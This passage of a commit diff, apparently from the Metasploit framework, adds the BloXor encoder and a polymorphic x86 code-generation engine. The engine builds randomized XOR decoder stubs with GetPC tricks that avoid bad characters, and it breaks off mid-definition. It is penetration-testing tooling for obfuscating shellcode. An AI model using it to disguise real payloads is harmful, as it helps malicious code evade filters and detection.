open up the bloxor encoder.

bug/bundler_fix
Stephen Fewer 2013-01-10 17:39:40 +00:00
parent d0478eb73f
commit 8e6e1bc164
8 changed files with 1868 additions and 4 deletions

View File

@ -22,16 +22,27 @@ module X86
ESI = DH = SI = 6
EDI = BH = DI = 7
REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx',
'esp', 'ebp', 'esi', 'edi' ] # :nodoc:
REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi' ]
REG_NAMES16 = [ 'ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di' ]
REG_NAMES8L = [ 'al', 'cl', 'dl', 'bl', nil, nil, nil, nil ]
# Jump tp a specific register
def self.jmp_reg(str)
reg = reg_number(str)
_check_reg(reg)
"\xFF" + [224 + reg].pack('C')
end
#
# Generate a LOOP instruction (Decrement ECX and jump short if ECX == 0)
#
def self.loop(offset)
"\xE2" + pack_lsb(rel_number(offset, -2))
end
#
# This method returns the opcodes that compose a jump instruction to the
# supplied relative offset.
def self.jmp(addr)

View File

@ -0,0 +1,326 @@
require 'rex/poly/machine'
module Rex
module Encoder
class BloXor < Msf::Encoder
def initialize( *args )
super
@machine = nil
@blocks_out = []
@block_size = 0
end
#
#
#
def decoder_stub( state )
if( not state.decoder_stub )
@blocks_out = []
@block_size = 0
# XXX: It would be ideal to use a random block size but unless we know the maximum size our final encoded
# blob can be we should instead start with the smallest block size and go up to avoid generating
# anything too big (if we knew the max size we could try something smaller if we generated a blob too big)
#block_sizes = (1..state.buf.length).to_a.shuffle
#block_sizes.each do | len |
1.upto( state.buf.length ) do | len |
# For now we ignore all odd sizes to help with performance (The rex poly machine
# doesnt have many load/store primitives that can handle byte sizes efficiently)
if( len % 2 != 0 )
next
end
blocks, size = compute_encoded( state, len )
if( blocks and size )
# We sanity check that the newly generated block ammount and the block size
# are not in the badchar list when converted into a hex form. Helps speed
# things up a great deal when generating a decoder stub later as these
# values may be used throughout.
if( not number_is_valid?( state, blocks.length - 1 ) or not number_is_valid?( state, ~( blocks.length - 1 ) ) )
next
end
if( not number_is_valid?( state, size ) or not number_is_valid?( state, ~size ) )
next
end
@blocks_out = blocks
@block_size = size
break
end
end
raise RuntimeError, "Unable to generate seed block." if( @blocks_out.empty? )
state.decoder_stub = compute_decoder( state )
end
state.decoder_stub
end
#
#
#
def encode_block( state, data )
buffer = ''
@blocks_out.each do | block |
buffer << block.pack( 'C*' )
end
buffer
end
protected
#
# Is a number in its byte form valid against the badchars?
#
def number_is_valid?( state, number )
size = 'C'
if( number > 0xFFFF )
size = 'V'
elsif( number > 0xFF )
size = 'v'
end
return Rex::Text.badchar_index( [ number ].pack( size ), state.badchars ).nil?
end
#
# Calculate Shannon's entropy.
#
def entropy( data )
entropy = 0.to_f
(0..255).each do | byte |
freq = data.to_s.count( byte.chr ).to_f / data.to_s.length
if( freq > 0 )
entropy -= freq * Math.log2( freq )
end
end
return entropy / 8
end
#
# Compute the encoded blocks (and associated seed)
#
def compute_encoded( state, len )
blocks_in = ::Array.new
input = '' << state.buf
block_padding = ( input.length % len ) > 0 ? len - ( input.length % len ) : 0
if( block_padding > 0 )
0.upto( block_padding-1 ) do
input << [ rand( 255 ) ].pack( 'C' )
end
end
while( input.length > 0 )
blocks_in << input[0..len-1].unpack( 'C*' )
input = input[len..input.length]
end
seed = compute_seed( blocks_in, len, block_padding, state.badchars.unpack( 'C*' ) )
if( not seed )
return [ nil, nil ]
end
blocks_out = [ seed ]
blocks_in.each do | block |
blocks_out << compute_block( blocks_out.last, block )
end
return [ blocks_out, len ]
end
#
# Generate the decoder stub which is functionally equivalent to the following:
#
# source = &end;
# dest = source + BLOCK_SIZE;
# counter = BLOCK_COUNT * ( BLOCK_SIZE / chunk_size );
# do
# {
# encoded = *(CHUNK_SIZE *)dest;
# dest += chunk_size;
# decoded = *(CHUNK_SIZE *)source;
# *(CHUNK_SIZE *)source = decoded ^ encoded;
# source += chunk_size;
# } while( --counter );
#
# end:
#
def compute_decoder( state )
@machine.create_variable( 'source' )
@machine.create_variable( 'dest' )
@machine.create_variable( 'counter' )
@machine.create_variable( 'encoded' )
@machine.create_variable( 'decoded' )
chunk_size = Rex::Poly::Machine::BYTE
if( @machine.native_size() == Rex::Poly::Machine::QWORD )
if( @block_size % Rex::Poly::Machine::QWORD == 0 )
chunk_size = Rex::Poly::Machine::QWORD
elsif( @block_size % Rex::Poly::Machine::DWORD == 0 )
chunk_size = Rex::Poly::Machine::DWORD
elsif( @block_size % Rex::Poly::Machine::WORD == 0 )
chunk_size = Rex::Poly::Machine::WORD
end
elsif( @machine.native_size() == Rex::Poly::Machine::DWORD )
if( @block_size % Rex::Poly::Machine::DWORD == 0 )
chunk_size = Rex::Poly::Machine::DWORD
elsif( @block_size % Rex::Poly::Machine::WORD == 0 )
chunk_size = Rex::Poly::Machine::WORD
end
elsif( @machine.native_size() == Rex::Poly::Machine::WORD )
if( @block_size % Rex::Poly::Machine::WORD == 0 )
chunk_size = Rex::Poly::Machine::WORD
end
end
# Block 1 - Set the source variable to the address of the start block
@machine.create_block_primitive( 'block1', 'set', 'source', 'location' )
# Block 2 - Set the source variable to the address of the 1st encoded block
@machine.create_block_primitive( 'block2', 'add', 'source', 'end' )
# Block 3 - Set the destingation variable to the value of the source variable
@machine.create_block_primitive( 'block3', 'set', 'dest', 'source' )
# Block 4 - Set the destingation variable to the address of the 2nd encoded block
@machine.create_block_primitive( 'block4', 'add', 'dest', @block_size )
# Block 5 - Sets the loop counter to the number of blocks to process
@machine.create_block_primitive( 'block5', 'set', 'counter', ( ( @block_size / chunk_size ) * (@blocks_out.length - 1) ) )
# Block 6 - Set the encoded variable to the byte pointed to by the dest variable
@machine.create_block_primitive( 'block6', 'load', 'encoded', 'dest', chunk_size )
# Block 7 - Increment the destination variable by one
@machine.create_block_primitive( 'block7', 'add', 'dest', chunk_size )
# Block 8 - Set the decoded variable to the byte pointed to by the source variable
@machine.create_block_primitive( 'block8', 'load', 'decoded', 'source', chunk_size )
# Block 9 - Xor the decoded variable with the encoded variable
@machine.create_block_primitive( 'block9', 'xor', 'decoded', 'encoded' )
# Block 10 - store the newly decoded byte
@machine.create_block_primitive( 'block10', 'store', 'source', 'decoded', chunk_size )
# Block 11 - Increment the source variable by one
@machine.create_block_primitive( 'block11', 'add', 'source', chunk_size )
# Block 12 - Jump back up to the outer_loop block while the counter variable > 0
@machine.create_block_primitive( 'block12', 'loop', 'counter', 'block6' )
# Try to generate the decoder stub...
decoder = @machine.generate
if( not decoder )
raise RuntimeError, "Unable to generate decoder stub."
end
decoder
end
#
# Compute the seed block which will successfully decode all proceeding encoded
# blocks while ensuring the encoded blocks do not contain any badchars.
#
def compute_seed( blocks_in, block_size, block_padding, badchars )
seed = []
redo_bytes = []
0.upto( block_size-1 ) do | index |
seed_bytes = (0..255).sort_by do
rand()
end
seed_bytes.each do | seed_byte |
next if( badchars.include?( seed_byte ) )
success = true
previous_byte = seed_byte
if( redo_bytes.length < 256 )
redo_bytes = (0..255).sort_by do
rand()
end
end
blocks_in.each do | block |
decoded_byte = block[ index ]
encoded_byte = previous_byte ^ decoded_byte
if( badchars.include?( encoded_byte ) )
# the padding bytes we added earlier can be changed if they are causing us to fail.
if( block == blocks_in.last and index >= (block_size-block_padding) )
if( redo_bytes.empty? )
success = false
break
end
block[ index ] = redo_bytes.shift
redo
end
success = false
break
end
previous_byte = encoded_byte
end
if( success )
seed << seed_byte
break
end
end
end
if( seed.length == block_size )
return seed
end
return nil
end
#
# Compute the next encoded block by xoring the previous
# encoded block with the next decoded block.
#
def compute_block( encoded, decoded )
block = []
0.upto( encoded.length-1 ) do | index |
block << ( encoded[ index ] ^ decoded[ index ] )
end
return block
end
end
end
end

View File

@ -4,6 +4,7 @@ module Poly
require 'rex/poly/register'
require 'rex/poly/block'
require 'rex/poly/machine'
###
#

12
lib/rex/poly/machine.rb Normal file
View File

@ -0,0 +1,12 @@
module Rex
module Poly
require 'metasm'
require 'rex/poly/machine/machine'
require 'rex/poly/machine/x86'
end
end

View File

@ -0,0 +1,829 @@
module Rex
module Poly
#
# A machine capable of creating a small blob of code in a metamorphic kind of way.
# Note: this is designed to perform an exhaustive search for a solution and can be
# slow. If you need a speedier option, the origional Rex::Polly::Block stuff is a
# better choice.
#
class Machine
QWORD = 8
DWORD = 4
WORD = 2
BYTE = 1
#
# A Permutation!
#
class Permutation
attr_accessor :active, :offset
attr_reader :name, :primitive, :length, :args
#
# Create a new permutation object.
#
def initialize( name, primitive, machine, source, args=nil )
@name = name
@primitive = primitive
@machine = machine
@source = source
@args = args
@active = false
@valid = true
@length = 0
@offset = 0
@children = ::Array.new
end
#
# Add in a child permutation to this one. Used to build the permutation tree.
#
def add_child( child )
@children << child
end
#
# Does this permutation have children?
#
def has_children?
not @children.empty?
end
#
# Remove any existing children. Called by the machines generate function
# to build a fresh tree in case generate was previously called.
#
def remove_children
@children.clear
end
#
# Actully render this permutation into a raw buffer.
#
def render
raw = ''
# Zero the length as we will be rendering the raw buffer and the length may change.
@length = 0
# If this permutation source is a Primitive/Procedure we can call it, otherwise we have a string
if( @source.kind_of?( Primitive ) or @source.kind_of?( ::Proc ) )
if( @source.kind_of?( Primitive ) )
raw = @source.call( @name, @machine, *@args )
elsif( @source.kind_of?( ::Proc ) )
raw = @source.call
end
# If the primitive/procedure returned an array, it is an array of assembly strings which we can assemble.
if( raw.kind_of?( ::Array ) )
lines = raw
raw = ''
# itterate over each line of assembly
lines.each do | asm |
# parse the asm and substitute in any offset values specified...
offsets = asm.scan( /:([\S]+)_offset/ )
offsets.each do | name, |
asm = asm.gsub( ":#{name}_offset", @machine.block_offset( name ).to_s )
end
# and substitute in and register values for any variables specified...
regs = asm.scan( /:([\S]+)_reg([\d]+)/ )
regs.each do | name, size |
asm = asm.gsub( ":#{name}_reg#{size}", @machine.variable_value( name, size.to_i ) )
end
# assemble it into a raw blob
blob = @machine.assemble( asm )
#if( not @machine.is_valid?( blob ) )
# p "#{name}(#{primitive}):#{asm} is invalid"
#end
raw << blob
end
end
else
# the source must just be a static string
raw = @source
end
# Update the length to reflect the new raw buffer
@length = raw.to_s.length
# As the temp variable is only assigned for the duration of a single permutation we
# can now release it if it was used in this permutation.
@machine.release_temp_variable
return raw.to_s
end
#
# Test if this permutation raw buffer is valid in this machine (e.g. against the badchar list).
#
def is_valid?
result = false
if( @valid )
begin
result = @machine.is_valid?( self.render )
rescue UnallowedPermutation
# This permutation is unallowed and can never be rendered so just mark it as
# not valid to skip it during future attempts.
@valid = false
rescue UndefinedPermutation
# allow an undefined permutation to fail validation but keep it marked
# as valid as it may be defined and passed validation later.
ensure
# Should a temporary variable have been assigned we can release it here.
@machine.release_temp_variable
end
end
return result
end
#
# Try to find a solution within the solution space by performing a depth first search
# into the permutation tree and backtracking when needed.
#
def solve
# Check to see if this permutation can make part of a valid solution
if( self.is_valid? )
# record this permutation as part of the final solution (the current machines register state is also saved here)
@machine.solution_push( self )
# If we have no children we are at the end of the tree and have a potential full solution.
if( not self.has_children? )
# We have a solution but doing a final pass to update offsets may introduce bad chars
# so we test for this and keep searching if this isnt a real solution after all.
if( not @machine.solution_is_valid? )
# remove this permutation and keep searching
@machine.solution_pop
return false
end
# Return true to unwind the recursive call as we have got a final solution.
return true
end
# Itterate over the children of this permutation (the perutations of the proceeding block).
@children.each do | child |
# Traverse into this child to keep trying to generate a solution...
if( child.solve )
# Keep returning true to unwind as we are done.
return true
end
end
# If we get here this permutation, origionally thought to be good for a solution, is not after all,
# so remove it from the machines final solution, restoring the register state aswell.
@machine.solution_pop
end
# No children can be made form part of the solution, return failure for this path in the tree.
return false
end
end
#
# A symbolic permutation to mark locations like the begining and end of a group of blocks.
# Used to calculate usefull offsets.
#
class SymbolicPermutation < Permutation
def initialize( name, machine, initial_offset=0 )
super( name, '', machine, '' )
# fudge the initial symbolic offset with a default (it gets patched correctly later),
# helps with the end symbolic block to not be 0 (as its a forward reference it really
# slows things down if we leave it 0)
@offset = initial_offset
# A symbolic block is allways active!
@active = true
end
#
# We block all attempts to set the active state of this permutation so as
# it is always true. This lets us always address the offset.
#
def active=( value )
end
end
#
# A primitive is a machine defined permutation which accepts some arguments when it is called.
#
class Primitive
#
# Initialize this primitive with its target source procedure and the machine it belongs to.
#
def initialize( source )
@source = source
end
#
# Call the primitives source procedure, passing in the arguments.
#
def call( name, machine, *args )
return @source.call( name, machine, *args )
end
end
#
#
#
class Block
#attr_accessor :next, :previous
attr_reader :name
def initialize( name )
@name = name
@next = nil
@previous = nil
@permutations = ::Array.new
end
def shuffle
@permutations = @permutations.shuffle
end
def solve
@permutations.first.solve
end
def << ( permutation )
@permutations << permutation
end
def each
@permutations.each do | permutation |
yield permutation
end
end
end
#
# A class to hold a solution for a Rex::Poly::Machine problem.
#
class Solution
attr_reader :offset
def initialize
@permutations = ::Array.new
@reg_state = ::Array.new
@offset = 0
end
#
# Reset this solution to an empty state.
#
def reset
@offset = 0
@permutations.each do | permutation |
permutation.active = false
permutation.offset = 0
end
@permutations.clear
@reg_state.clear
end
#
# Push a new permutation onto this solutions permutations list and save the associated register/variables state
#
def push( permutation, reg_available, reg_consumed, variables )
permutation.active = true
permutation.offset = @offset
@offset += permutation.length
@permutations.push( permutation )
@reg_state.push( [ [].concat(reg_available), [].concat(reg_consumed), {}.merge(variables) ] )
end
#
# Pop off the last permutaion and register/variables state from this solution.
#
def pop
reg_available, reg_consumed, variables = @reg_state.pop
permutation = @permutations.pop
permutation.active = false
permutation.offset = 0
@offset -= permutation.length
return permutation, reg_available, reg_consumed, variables
end
#
# Render the final buffer.
#
def buffer
previous_offset = nil
count = 0
# perform an N-pass fixup for offsets...
while( true ) do
# If we cant get the offsets fixed within a fixed ammount of tries we return
# nil to indicate failure and keep searching for a solution that will work.
if( count > 64 )
return nil
end
# Reset the solution offset so as to update it for this pass
@offset = 0
# perform a single pass to ensure we are using the correct offset values
@permutations.each do | permutation |
permutation.offset = @offset
# Note: calling render() can throw both UndefinedPermutation and UnallowedPermutation exceptions,
# however as we assume we only ever return the buffer once a final solution has been generated
# we should never have either of those exceptions thrown.
permutation.render
@offset += permutation.length
end
# If we have generated two consecutive passes which are the same length we can stop fixing up the offsets.
if( not previous_offset.nil? and @offset == previous_offset )
break
end
count +=1
previous_offset = @offset
end
# now a final pass to render the solution into the raw buffer
raw = ''
@permutations.each do | permutation |
#$stderr.puts "#{permutation.name} - #{ "0x%08X (%d)" % [ permutation.offset, permutation.length] } "
raw << permutation.render
end
return raw
end
end
#
# Create a new machine instance.
#
def initialize( badchars, cpu )
@badchars = badchars
@cpu = cpu
@reg_available = ::Array.new
@reg_consumed = ::Array.new
@variables = ::Hash.new
@blocks = ::Hash.new
@primitives = ::Hash.new
@solution = Solution.new
_create_primitives
@blocks['begin'] = Block.new( 'begin' )
@blocks['begin'] << SymbolicPermutation.new( 'begin', self )
_create_variable( 'temp' )
end
#
# Overloaded by a subclass to return the maximum native general register size supported.
#
def native_size
nil
end
#
# Use METASM to assemble a line of asm using this machines current cpu.
#
def assemble( asm )
return Metasm::Shellcode.assemble( @cpu, asm ).encode_string
end
#
# Check if a data blob is valid against the badchar list (or perform any other validation here)
#
def is_valid?( data )
if( data.nil? )
return false
end
return Rex::Text.badchar_index( data, @badchars ).nil?
end
#
# Generate a 64 bit number whoes bytes are valid in this machine.
#
def make_safe_qword( number=nil )
return _make_safe_number( QWORD, number ) & 0xFFFFFFFFFFFFFFFF
end
#
# Generate a 32 bit number whoes bytes are valid in this machine.
#
def make_safe_dword( number=nil )
return _make_safe_number( DWORD, number ) & 0xFFFFFFFF
end
#
# Generate a 16 bit number whoes bytes are valid in this machine.
#
def make_safe_word( number=nil )
return _make_safe_number( WORD, number ) & 0xFFFF
end
#
# Generate a 8 bit number whoes bytes are valid in this machine.
#
def make_safe_byte( number=nil )
return _make_safe_number( BYTE, number ) & 0xFF
end
#
# Create a variable by name which will be assigned a register during generation. We can
# optionally assign a static register value to a variable if needed.
#
def create_variable( name, reg=nil )
# Sanity check we aren't trying to create one of the reserved variables.
if( name == 'temp' )
raise RuntimeError, "Unable to create variable, '#{name}' is a reserved variable name."
end
return _create_variable( name, reg )
end
#
# If the temp variable was assigned we release it.
#
def release_temp_variable
if( @variables['temp'] )
regnum = @variables['temp']
# Sanity check the temp variable was actually assigned (it may not have been if the last permutation didnot use it)
if( regnum )
# place the assigned register back in the available list for consumption later.
@reg_available.push( @reg_consumed.delete( regnum ) )
# unasign the temp vars register
@variables['temp'] = nil
return true
end
end
return false
end
#
# Resolve a variable name into its currently assigned register value.
#
def variable_value( name, size=nil )
# Sanity check we this variable has been created
if( not @variables.has_key?( name ) )
raise RuntimeError, "Unknown register '#{name}'."
end
# Pull out its current register value if it has been assigned one
regnum = @variables[ name ]
if( not regnum )
regnum = @reg_available.pop
if( not regnum )
raise RuntimeError, "Unable to assign variable '#{name}' a register value, none available."
end
# and add it to the consumed list so we can track it later
@reg_consumed << regnum
# and now assign the variable the register
@variables[ name ] = regnum
end
# resolve the register number int a string representation (e.g. 0 in x86 is EAX if size is 32)
return _register_value( regnum, size )
end
#
# Check this solution is still currently valid (as offsets change it may not be).
#
def solution_is_valid?
return self.is_valid?( @solution.buffer )
end
#
# As the solution advances we save state for each permutation step in the solution. This lets
# use rewind at a later stage if the solving algorithm wishes to perform some backtracking.
#
def solution_push( permutation )
@solution.push( permutation, @reg_available, @reg_consumed, @variables )
end
#
# Backtrack one step in the solution and restore the register/variable state.
#
def solution_pop
permutation, @reg_available, @reg_consumed, @variables = @solution.pop
@reg_available.push( @reg_available.shift )
end
#
# Create a block by name and add in its list of permutations.
#
# XXX: this doesnt support the fuzzy order of block dependencies ala the origional rex::poly
def create_block( name, *permutation_sources )
# Sanity check we aren't trying to create one of the reserved symbolic blocks.
if( name == 'begin' or name == 'end' )
raise RuntimeError, "Unable to add block, '#{name}' is a reserved block name."
end
# If this is the first time this block is being created, create the block object to hold the permutation list
if( not @blocks[name] )
@blocks[name] = Block.new( name )
end
# Now create a new permutation object for every one supplied.
permutation_sources.each do | source |
@blocks[name] << Permutation.new( name, '', self, source )
end
return name
end
#
# Create a block which is based on a primitive defined by this machine.
#
def create_block_primitive( block_name, primitive_name, *args )
# Santiy check this primitive is actually available and is not an internal primitive (begins with an _).
if( not @primitives[primitive_name] or primitive_name[0] == "_" )
raise RuntimeError, "Unable to add block, Primitive '#{primitive_name}' is not available."
end
# Sanity check we aren't trying to create one of the reserved symbolic blocks.
if( block_name == 'begin' or block_name == 'end' )
raise RuntimeError, "Unable to add block, '#{block_name}' is a reserved block name."
end
return _create_block_primitive( block_name, primitive_name, *args )
end
#
# Get the offset for a blocks active permutation. This is easy for backward references as
# they will already have been rendered and their sizes known. For forward references we
# can't know in advance but the correct value can be known later once the final solution is
# available and a final pass to generate the raw buffer is made.
#
def block_offset( name )
if( name == 'end' )
return @solution.offset
elsif( @blocks[name] )
@blocks[name].each do | permutation |
if( permutation.active )
return permutation.offset
end
end
end
# If we are forward referencing a block it will be at least the current solutions offset +1
return @solution.offset + 1
end
#
# Does a given block exist?
#
def block_exist?( name )
return @blocks.include?( name )
end
#
# Does a given block exist?
#
def variable_exist?( name )
return @variables.include?( name )
end
# XXX: ambiguity between variable names and block name may introduce confusion!!! make them be unique.
#
# Resolve a given value into either a number literal, a block offset or
# a variables assigned register.
#
def resolve_value( value, size=nil )
if( block_exist?( value ) )
return block_offset( value )
elsif( variable_exist?( value ) )
return variable_value( value, size )
end
return value.to_i
end
#
# Get the block previous to the target block.
#
def block_previous( target_block )
previous_block = nil
@blocks.each_key do | current_block |
if( current_block == target_block )
return previous_block
end
previous_block = current_block
end
return nil
end
#
# Get the block next to the target block.
#
def block_next( target_block )
@blocks.each_key do | current_block |
if( block_previous( current_block ) == target_block )
return current_block
end
end
return nil
end
#
# Try to generate a solution.
#
def generate
if( @blocks.has_key?( 'end' ) )
@blocks.delete( 'end' )
end
@blocks['end'] = Block.new( 'end' )
@blocks['end'] << SymbolicPermutation.new( 'end', self, 1 )
# Mix up the permutation orders for each block and create the tree structure.
previous = ::Array.new
@blocks.each_value do | block |
# Shuffle the order of the blocks permutations.
block.shuffle
# create the tree by adding the current blocks permutations as children of the previous block.
current = ::Array.new
block.each do | permutation |
permutation.remove_children
previous.each do | prev |
prev.add_child( permutation )
end
current << permutation
end
previous = current
end
# Shuffle the order of the available registers
@reg_available = @reg_available.shuffle
# We must try every permutation of the register orders, so if we fail to
# generate a solution we rotate the available registers to try again with
# a different order. This ensures we perform and exhaustive search.
0.upto( @reg_available.length - 1 ) do
@solution.reset
# Start from the root node in the solution space and generate a
# solution by traversing the solution space's tree structure.
if( @blocks['begin'].solve )
# Return the solutions buffer (perform a last pass to fixup all offsets)...
return @solution.buffer
end
@reg_available.push( @reg_available.shift )
end
# :(
nil
end
#
# An UndefinedPermutation exception is raised when a permutation can't render yet
# as the conditions required are not yet satisfied.
#
class UndefinedPermutation < RuntimeError
def initialize( msg=nil )
super
end
end
#
# An UnallowedPermutation exception is raised when a permutation can't ever render
# as the conditions supplied are impossible to satisfy.
#
class UnallowedPermutation < RuntimeError
def initialize( msg=nil )
super
end
end
#
# An InvalidPermutation exception is raised when a permutation receives a invalid
# argument and cannot continue to render. This is a fatal exception.
#
class InvalidPermutation < RuntimeError
def initialize( msg=nil )
super
end
end
protected
#
# Overloaded by a subclass to resolve a register number into a suitable register
# name for the target architecture. E.g on x64 the register number 0 with size 64
# would resolve to RCX. Size is nil by default to indicate we want the default
# machine size, e.g. 32bit DWORD on x86 or 64bit QWORD on x64.
#
def _register_value( regnum, size=nil )
nil
end
#
# Perform the actual variable creation.
#
def _create_variable( name, reg=nil )
regnum = nil
# Sanity check this variable has not already been created.
if( @variables[name] )
raise RuntimeError, "Variable '#{name}' is already created."
end
# If a fixed register is being assigned to this variable then resolve it
if( reg )
# Resolve the register name into a register number
@reg_available.each do | num |
if( _register_value( num ) == reg.downcase )
regnum = num
break
end
end
# If an invalid register name was given or the chosen register is not available we must fail.
if( not regnum )
raise RuntimeError, "Register '#{reg}' is unknown or unavailable."
end
# Sanity check another variable isnt assigned this register
if( @variables.has_value?( regnum ) )
raise RuntimeError, "Register number '#{regnum}' is already consumed by variable '#{@variables[name]}'."
end
# Finally we consume the register chosen so we dont select it again later.
@reg_consumed << @reg_available.delete( regnum )
end
# Create the variable and assign it a register number (or nil if not yet assigned)
@variables[name] = regnum
return name
end
#
# Create a block which is based on a primitive defined by this machine.
#
def _create_block_primitive( block_name, primitive_name, *args )
# If this is the first time this block is being created, create the array to hold the permutation list
if( not @blocks[block_name] )
@blocks[block_name] = Block.new( block_name )
end
# Now create a new permutation object for every one supplied.
@primitives[primitive_name].each do | source |
@blocks[block_name] << Permutation.new( block_name, primitive_name, self, source, args )
end
return block_name
end
#
# Overloaded by a subclass to create any primitives available in this machine.
#
def _create_primitives
nil
end
#
# Rex::Poly::Machine::Primitive
#
def _create_primitive( name, *permutations )
# If this is the first time this primitive is being created, create the array to hold the permutation list
if( not @primitives[name] )
@primitives[name] = ::Array.new
end
# Add in the permutation object (Rex::Poly::Machine::Primitive) for every one supplied.
permutations.each do | permutation |
@primitives[name] << Primitive.new( permutation )
end
end
#
# Helper function to generate a number whoes byte representation is valid in this
# machine (does not contain any badchars for example). Optionally we can supply a
# number and the resulting addition/subtraction of this number against the newly
# generated value is also tested for validity. This helps in the assembly primitives
# which can use these values.
#
def _make_safe_number( bytes, number=nil )
format = ''
if( bytes == BYTE )
format = 'C'
elsif( bytes == WORD )
format = 'v'
elsif( bytes == DWORD )
format = 'V'
elsif( bytes == QWORD )
format = 'Q'
else
raise RuntimeError, "Invalid size '#{bytes}' used in _make_safe_number."
end
goodchars = (0..255).to_a
@badchars.unpack( 'C*' ).each do | b |
goodchars.delete( b.chr )
end
while( true ) do
value = 0
0.upto( bytes-1 ) do | i |
value |= ( (goodchars[ rand(goodchars.length) ] << i*8) & (0xFF << i*8) )
end
if( not is_valid?( [ value ].pack(format) ) or not is_valid?( [ ~value ].pack(format) ) )
redo
end
if( not number.nil? )
if( not is_valid?( [ value + number ].pack(format) ) or not is_valid?( [ value - number ].pack(format) ) )
redo
end
end
break
end
return value
end
end
end
end

508
lib/rex/poly/machine/x86.rb Normal file
View File

@ -0,0 +1,508 @@
module Rex
module Poly
#
# A subclass to represent a Rex poly machine on the x86 architecture.
#
class MachineX86 < Rex::Poly::Machine
def initialize( badchars='', consume_base_pointer=nil, consume_stack_pointer=true )
super( badchars, Metasm::Ia32.new )
@reg_available << Rex::Arch::X86::EAX
@reg_available << Rex::Arch::X86::EBX
@reg_available << Rex::Arch::X86::ECX
@reg_available << Rex::Arch::X86::EDX
@reg_available << Rex::Arch::X86::ESI
@reg_available << Rex::Arch::X86::EDI
@reg_available << Rex::Arch::X86::EBP
@reg_available << Rex::Arch::X86::ESP
# By default we consume the EBP register if badchars contains \x00. This helps speed
# things up greatly as many instructions opperating on EBP introduce a NULL byte. For
# example, a MOV instruction with EAX as the source operand is as follows:
# 8B08 mov ecx, [eax]
# but the same instruction with EBP as the source operand is as follows:
# 8B4D00 mov ecx, [ebp] ; This is assembled as 'mov ecx, [ebp+0]'
# we can see that EBP is encoded differently with an offset included. We can still
# try to generate a solution with EBP included and \x00 in the badchars list but
# it can take considerably longer.
if( ( consume_base_pointer.nil? and not Rex::Text.badchar_index( "\x00", @badchars ).nil? ) or consume_base_pointer == true )
create_variable( 'base_pointer', 'ebp' )
end
# By default we consume the ESP register to avoid munging the stack.
if( consume_stack_pointer )
create_variable( 'stack_pointer', 'esp' )
end
# discover all the safe FPU instruction we can use.
@safe_fpu_instructions = ::Array.new
Rex::Arch::X86.fpu_instructions.each do | fpu |
if( is_valid?( fpu ) )
@safe_fpu_instructions << fpu
end
end
end
#
# The general purpose registers are 32bit
#
def native_size
Rex::Poly::Machine::DWORD
end
#
# Overload this method to intercept the 'set' primitive with the 'location' keyword
# and create the block with the '_set_variable_location'. We do this to keep a
# consistent style.
#
def create_block_primitive( block_name, primitive_name, *args )
if( primitive_name == 'set' and args.length == 2 and args[1] == 'location' )
_create_block_primitive( block_name, '_set_variable_location', args[0] )
else
super
end
end
#
# XXX: If we have a loop primitive, it is a decent speed bump to force the associated variable
# of the first loop primitive to be assigned as ECX (for the x86 LOOP instruction), this is not
# neccasary but can speed generation up significantly.
#
#def generate
# @blocks.each_value do | block |
# if( block.first.primitive == 'loop' )
# @variables.delete( block.first.args.first )
# create_variable( block.first.args.first, 'ecx' )
# break
# end
# end
# # ...go go go
# super
#end
protected
#
# Resolve a register number into a suitable register name.
#
def _register_value( regnum, size=nil )
value = nil
# we default to a native 32 bits if no size is specified.
if( size.nil? )
size = native_size()
end
if( size == Rex::Poly::Machine::DWORD )
value = Rex::Arch::X86::REG_NAMES32[ regnum ]
elsif( size == Rex::Poly::Machine::WORD )
value = Rex::Arch::X86::REG_NAMES16[ regnum ]
elsif( size == Rex::Poly::Machine::BYTE )
# (will return nil for ESI,EDI,EBP,ESP)
value = Rex::Arch::X86::REG_NAMES8L[ regnum ]
else
raise RuntimeError, "Register number '#{regnum}' (size #{size.to_i}) is unavailable."
end
return value
end
#
# Create the x86 primitives.
#
def _create_primitives
#
# Create the '_set_variable_location' primitive. The first param it the variable to place the current
# blocks location value in.
#
_create_primitive( '_set_variable_location',
::Proc.new do | block, machine, variable |
if( @safe_fpu_instructions.empty? )
raise UnallowedPermutation
end
[
"dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }",
"mov #{machine.variable_value( 'temp' )}, esp",
"fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]",
"pop #{machine.variable_value( variable )}"
]
end,
::Proc.new do | block, machine, variable |
if( @safe_fpu_instructions.empty? )
raise UnallowedPermutation
end
[
"dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }",
"mov #{machine.variable_value( 'temp' )}, esp",
"fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]",
"pop #{machine.variable_value( variable )}"
]
end,
::Proc.new do | block, machine, variable |
if( @safe_fpu_instructions.empty? )
raise UnallowedPermutation
end
[
"dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }",
"push esp",
"pop #{machine.variable_value( 'temp' )}",
"fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]",
"pop #{machine.variable_value( variable )}"
]
end,
::Proc.new do | block, machine, variable |
if( @safe_fpu_instructions.empty? )
raise UnallowedPermutation
end
[
"dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }",
"fnstenv [ esp - 12 ]",
"pop #{machine.variable_value( variable )}"
]
end,
::Proc.new do | block, machine, variable |
[
"call $+5",
"pop #{machine.variable_value( variable )}",
"push #{machine.block_offset( block ) + 5}",
"pop #{machine.variable_value( 'temp' )}",
"sub #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}"
]
end,
::Proc.new do | block, machine, variable |
[
"db 0xE8, 0xFF, 0xFF, 0xFF, 0xFF, 0xC0",
"pop #{machine.variable_value( variable )}",
"push #{machine.block_offset( block ) + 5}",
"pop #{machine.variable_value( 'temp' )}",
"sub #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}"
]
end
)
#
# Create the 'loop' primitive. The first param it the counter variable which holds the number of
# times to perform the loop. The second param it the destination block to loop to.
#
_create_primitive( 'loop',
::Proc.new do | block, machine, counter, destination |
